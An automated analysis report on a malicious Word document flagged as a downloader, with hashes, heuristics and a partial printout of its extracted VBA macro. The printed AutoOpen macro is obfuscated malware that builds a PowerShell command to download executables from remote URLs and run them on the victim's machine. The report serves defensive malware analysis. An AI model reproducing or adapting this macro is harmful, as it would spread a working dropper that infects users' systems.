Office (OLE) malware analysis — malicious · 9acc1502c8a145e5

MALICIOUS

Office (OLE)

69.1 KB Created: 2018-09-13 16:15:00 Authoring application: Microsoft Office Word First seen: 2019-02-10

MD5: d359be0031f1a92bd886699843d0430f SHA-1: 56173a10b573e98f60baa79a9822839f89e28f14 SHA-256: 9acc1502c8a145e569fb80ec294f4077f10c7a668f7c8032aaf4464e1d8293ef

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and appears to be designed to execute a command, likely to download and run a second-stage payload. The ClamAV detection 'Doc.Downloader.Pederr-6686124-0' further supports its downloader functionality.

Heuristics 5

ClamAV: Doc.Downloader.Pederr-6686124-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Pederr-6686124-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5059 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5059 bytes
SHA-256: `c7109f8059d4ff69b243179bae38f0265f959bed87df01aa2d73cf98667169bd`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ufsFjVXnw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On _ Error _ Resume _ Next Dim oKTFKz() ReDim oKTFKz(2) oKTFKz(0) = 331545501 oKTFKz(1) = 211190541 Dim kaolU() ReDim kaolU(5) kaolU(0) = 600 kaolU(1) = 273765312 kaolU(2) = 65 kaolU(3) = 25 kaolU(4) = 7736 Dim OwQrip() ReDim OwQrip(2) OwQrip(0) = 114 OwQrip(1) = 54 Dim iaXZc() ReDim iaXZc(4) iaXZc(0) = 389237678 iaXZc(1) = 54 iaXZc(2) = 3 iaXZc(3) = 1 Dim BTVJCj() ReDim BTVJCj(5) BTVJCj(0) = 6 BTVJCj(1) = 82 BTVJCj(2) = 410 BTVJCj(3) = 318 BTVJCj(4) = 891 Dim wYpjQt() ReDim wYpjQt(5) wYpjQt(0) = 65 wYpjQt(1) = 94221562 wYpjQt(2) = 9 wYpjQt(3) = 9 wYpjQt(4) = 2 Dim HBjpzz() ReDim HBjpzz(5) HBjpzz(0) = 279345813 HBjpzz(1) = 8 HBjpzz(2) = 191 HBjpzz(3) = 7 HBjpzz(4) = 22 Dim DKrKY() ReDim DKrKY(2) DKrKY(0) = 3106 DKrKY(1) = 48 Shell@ sIvKY + zWLDbJpPLcW + jEAtjhKb, Format(0) Dim EzTsL() ReDim EzTsL(5) EzTsL(0) = 424262663 EzTsL(1) = 636 EzTsL(2) = 424272988 EzTsL(3) = 395 EzTsL(4) = 336623454 Dim Inrskf() ReDim Inrskf(5) Inrskf(0) = 115611113 Inrskf(1) = 1 Inrskf(2) = 942 Inrskf(3) = 5 Inrskf(4) = 37 Dim cIkQJ() ReDim cIkQJ(4) cIkQJ(0) = 3 cIkQJ(1) = 19 cIkQJ(2) = 164 cIkQJ(3) = 2606 Dim dduUc() ReDim dduUc(4) dduUc(0) = 852 dduUc(1) = 7947 dduUc(2) = 7 dduUc(3) = 475 End Sub Attribute VB_Name = "WqBQHiuq" Function sIvKY() On _ Error _ Resume _ Next Dim JGIqnU() ReDim JGIqnU(4) JGIqnU(0) = 4 JGIqnU(1) = 1 JGIqnU(2) = 93 JGIqnU(3) = 6 Dim oCrEq() ReDim oCrEq(5) oCrEq(0) = 698 oCrEq(1) = 18 oCrEq(2) = 423 oCrEq(3) = 73 oCrEq(4) = 4 tbXTzFfUQXp = Format(Chr(4 + 0 + 1 + 1 + 93)) + "md /V:^O/" + Format(Chr(3 + 0 + 0 + 1 + 63)) + Format(Chr(1 + 0 + 0 + 0 + 33)) + "s^et " + "^Q2^B=^ ^ ^ ^ ^ ^ " + "^ ^ ^ ^ ^ }}{h" + Format(Chr(4 + 0 + 1 + 1 + 93)) + "t^a" + Format(Chr(4 + 0 + 1 + 1 + 93)) + "}" + "^;^k^a" + "er^b;^sl^z^$^ ^me^tI-e^kov" + "nI;)^sl^z$^ ,^l^" + "jN^$(eli^Fd^aoln^woD^.wXM^$^{" + "^yr^t{)^EGP^$ ni ^" + "ljN$(h" + Format(Chr(4 + 0 + 1 + 1 + 93)) + "aerof^;^'exe.'+^j^T" Dim XwIDKm() ReDim XwIDKm(4) XwIDKm(0) = 3 XwIDKm(1) = 336 XwIDKm(2) = 70 XwIDKm(3) = 714 Dim qGjKw() ReDim qGjKw(5) qGjKw(0) = 3 qGjKw(1) = 426928655 qGjKw(2) = 8 qGjKw(3) = 31 qGjKw(4) = 87 Dim MpLBiz() ReDim MpLBiz(2) MpLBiz(0) = 6 MpLBiz(1) = 97 Dim PhSbY() ReDim PhSbY(3) PhSbY(0) = 6 PhSbY(1) = 25869587 PhSbY(2) = 3010 vmvvfQEOm = "U$+'^\'+" + Format(Chr(4 + 0 + 1 + 1 + 93)) + "il^b^up" + "^:vne$^=^s^lz^$;^'^0^8" + "4^' = j^TU$^;)'@^'(t^il" + "^pS.'^LJVs^7z^5^sE^" + "8/mo" + Format(Chr(4 + 0 + 1 + 1 + 93)) + ".^xfra^t^la//:^" + "pt^th@lo3t^1^JV/b^a^lt^s^et/" + "if.^monat^ad.s" + "a^mot//^:ptth^@A^HNv^172/^" + "ur^.na^f^s^urbi^l//^:p^t^th@M^" + "zW^6^kb" + "^X^HeJ/st^" + "o^hs^pan^s-^p^w/" + Format(Chr(4 + 0 + 1 + 1 + 93)) + "^oli^ah/om^ed" + "/nv^." + Format(Chr(4 + 0 + 1 + 1 + 93)) + "^" Dim zTtitw() ReDim zTtitw(3) zTtitw(0) = 62 zTtitw(1) = 339030795 zTtitw(2) = 25 Dim BOqJM() ReDim BOqJM(4) BOqJM(0) = 94 BOqJM(1) = 5 BOqJM(2) = 53855125 BOqJM(3) = 52 Dim TkEtt() ReDim TkEtt(5) TkEtt(0) = 442350421 TkEtt(1) = 7801 TkEtt(2) = 19 TkEtt(3) = 704 TkEtt(4) = 92 Dim EGwMFZ() ReDim EGwMFZ(3) EGwMFZ(0) = 9466 EGwMFZ(1) = 6 EGwMFZ(2) = 799 Dim pVCsI() ReDim pVCsI(3) pVCsI(0) = 507 pVCsI(1) = 446357375 pVCsI(2) = 2603 zCskwn = "otv^.eti^s" + "^b^e^w//:^pt^t^" + "h^@^Y^I" + Format(Chr(3 + 0 + 0 + 1 + 63)) + "u^d" + "^1^5w^S/^ten^.^gninoke^il^im^" + "a^f//^:^ptth^'^=^EG^P^$;tne" + "^i^l" + Format(Chr(3 + 0 + 0 + 1 + 63)) + "^be^W.^" Dim ZAuFF() ReDim ZAuFF(5) ZAuFF(0) = 6042 ZAuFF(1) = 4617 ZAuFF(2) = 13 ZAuFF(3) = 49 ZAuFF(4) = 9 Dim LEwNok() ReDim LEwNok(4) LEwNok(0) = 464073611 LEwNok( ... (truncated)

SHA-256: c7109f8059d4ff69b243179bae38f0265f959bed87df01aa2d73cf98667169bd

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ufsFjVXnw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
   Dim oKTFKz()
ReDim oKTFKz(2)
oKTFKz(0) = 331545501
oKTFKz(1) = 211190541

   Dim kaolU()
ReDim kaolU(5)
kaolU(0) = 600
kaolU(1) = 273765312
kaolU(2) = 65
kaolU(3) = 25
kaolU(4) = 7736

   Dim OwQrip()
ReDim OwQrip(2)
OwQrip(0) = 114
OwQrip(1) = 54

   Dim iaXZc()
ReDim iaXZc(4)
iaXZc(0) = 389237678
iaXZc(1) = 54
iaXZc(2) = 3
iaXZc(3) = 1

   Dim BTVJCj()
ReDim BTVJCj(5)
BTVJCj(0) = 6
BTVJCj(1) = 82
BTVJCj(2) = 410
BTVJCj(3) = 318
BTVJCj(4) = 891

   Dim wYpjQt()
ReDim wYpjQt(5)
wYpjQt(0) = 65
wYpjQt(1) = 94221562
wYpjQt(2) = 9
wYpjQt(3) = 9
wYpjQt(4) = 2

   Dim HBjpzz()
ReDim HBjpzz(5)
HBjpzz(0) = 279345813
HBjpzz(1) = 8
HBjpzz(2) = 191
HBjpzz(3) = 7
HBjpzz(4) = 22

   Dim DKrKY()
ReDim DKrKY(2)
DKrKY(0) = 3106
DKrKY(1) = 48

Shell@ sIvKY + zWLDbJpPLcW + jEAtjhKb, Format(0)
   Dim EzTsL()
ReDim EzTsL(5)
EzTsL(0) = 424262663
EzTsL(1) = 636
EzTsL(2) = 424272988
EzTsL(3) = 395
EzTsL(4) = 336623454

   Dim Inrskf()
ReDim Inrskf(5)
Inrskf(0) = 115611113
Inrskf(1) = 1
Inrskf(2) = 942
Inrskf(3) = 5
Inrskf(4) = 37

   Dim cIkQJ()
ReDim cIkQJ(4)
cIkQJ(0) = 3
cIkQJ(1) = 19
cIkQJ(2) = 164
cIkQJ(3) = 2606

   Dim dduUc()
ReDim dduUc(4)
dduUc(0) = 852
dduUc(1) = 7947
dduUc(2) = 7
dduUc(3) = 475

End Sub



Attribute VB_Name = "WqBQHiuq"
Function sIvKY()

On _
Error _
Resume _
Next
Dim JGIqnU()
ReDim JGIqnU(4)
JGIqnU(0) = 4
JGIqnU(1) = 1
JGIqnU(2) = 93
JGIqnU(3) = 6

   Dim oCrEq()
ReDim oCrEq(5)
oCrEq(0) = 698
oCrEq(1) = 18
oCrEq(2) = 423
oCrEq(3) = 73
oCrEq(4) = 4

tbXTzFfUQXp = Format(Chr(4 + 0 + 1 + 1 + 93)) + "md /V:^O/" + Format(Chr(3 + 0 + 0 + 1 + 63)) + Format(Chr(1 + 0 + 0 + 0 + 33)) + "s^et " + "^Q2^B=^ ^ ^ ^ ^ ^ " + "^ ^ ^    ^    ^ }}{h" + Format(Chr(4 + 0 + 1 + 1 + 93)) + "t^a" + Format(Chr(4 + 0 + 1 + 1 + 93)) + "}" + "^;^k^a" + "er^b;^sl^z^$^ ^me^tI-e^kov" + "nI;)^sl^z$^ ,^l^" + "jN^$(eli^Fd^aoln^woD^.wXM^$^{" + "^yr^t{)^EGP^$ ni ^" + "ljN$(h" + Format(Chr(4 + 0 + 1 + 1 + 93)) + "aerof^;^'exe.'+^j^T"
Dim XwIDKm()
ReDim XwIDKm(4)
XwIDKm(0) = 3
XwIDKm(1) = 336
XwIDKm(2) = 70
XwIDKm(3) = 714

   Dim qGjKw()
ReDim qGjKw(5)
qGjKw(0) = 3
qGjKw(1) = 426928655
qGjKw(2) = 8
qGjKw(3) = 31
qGjKw(4) = 87

   Dim MpLBiz()
ReDim MpLBiz(2)
MpLBiz(0) = 6
MpLBiz(1) = 97

   Dim PhSbY()
ReDim PhSbY(3)
PhSbY(0) = 6
PhSbY(1) = 25869587
PhSbY(2) = 3010

vmvvfQEOm = "U$+'^\'+" + Format(Chr(4 + 0 + 1 + 1 + 93)) + "il^b^up" + "^:vne$^=^s^lz^$;^'^0^8" + "4^' = j^TU$^;)'@^'(t^il" + "^pS.'^LJVs^7z^5^sE^" + "8/mo" + Format(Chr(4 + 0 + 1 + 1 + 93)) + ".^xfra^t^la//:^" + "pt^th@lo3t^1^JV/b^a^lt^s^et/" + "if.^monat^ad.s" + "a^mot//^:ptth^@A^HNv^172/^" + "ur^.na^f^s^urbi^l//^:p^t^th@M^" + "zW^6^kb" + "^X^HeJ/st^" + "o^hs^pan^s-^p^w/" + Format(Chr(4 + 0 + 1 + 1 + 93)) + "^oli^ah/om^ed" + "/nv^." + Format(Chr(4 + 0 + 1 + 1 + 93)) + "^"
Dim zTtitw()
ReDim zTtitw(3)
zTtitw(0) = 62
zTtitw(1) = 339030795
zTtitw(2) = 25

   Dim BOqJM()
ReDim BOqJM(4)
BOqJM(0) = 94
BOqJM(1) = 5
BOqJM(2) = 53855125
BOqJM(3) = 52

   Dim TkEtt()
ReDim TkEtt(5)
TkEtt(0) = 442350421
TkEtt(1) = 7801
TkEtt(2) = 19
TkEtt(3) = 704
TkEtt(4) = 92

   Dim EGwMFZ()
ReDim EGwMFZ(3)
EGwMFZ(0) = 9466
EGwMFZ(1) = 6
EGwMFZ(2) = 799

   Dim pVCsI()
ReDim pVCsI(3)
pVCsI(0) = 507
pVCsI(1) = 446357375
pVCsI(2) = 2603

zCskwn = "otv^.eti^s" + "^b^e^w//:^pt^t^" + "h^@^Y^I" + Format(Chr(3 + 0 + 0 + 1 + 63)) + "u^d" + "^1^5w^S/^ten^.^gninoke^il^im^" + "a^f//^:^ptth^'^=^EG^P^$;tne" + "^i^l" + Format(Chr(3 + 0 + 0 + 1 + 63)) + "^be^W.^"
Dim ZAuFF()
ReDim ZAuFF(5)
ZAuFF(0) = 6042
ZAuFF(1) = 4617
ZAuFF(2) = 13
ZAuFF(3) = 49
ZAuFF(4) = 9

   Dim LEwNok()
ReDim LEwNok(4)
LEwNok(0) = 464073611
LEwNok(
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.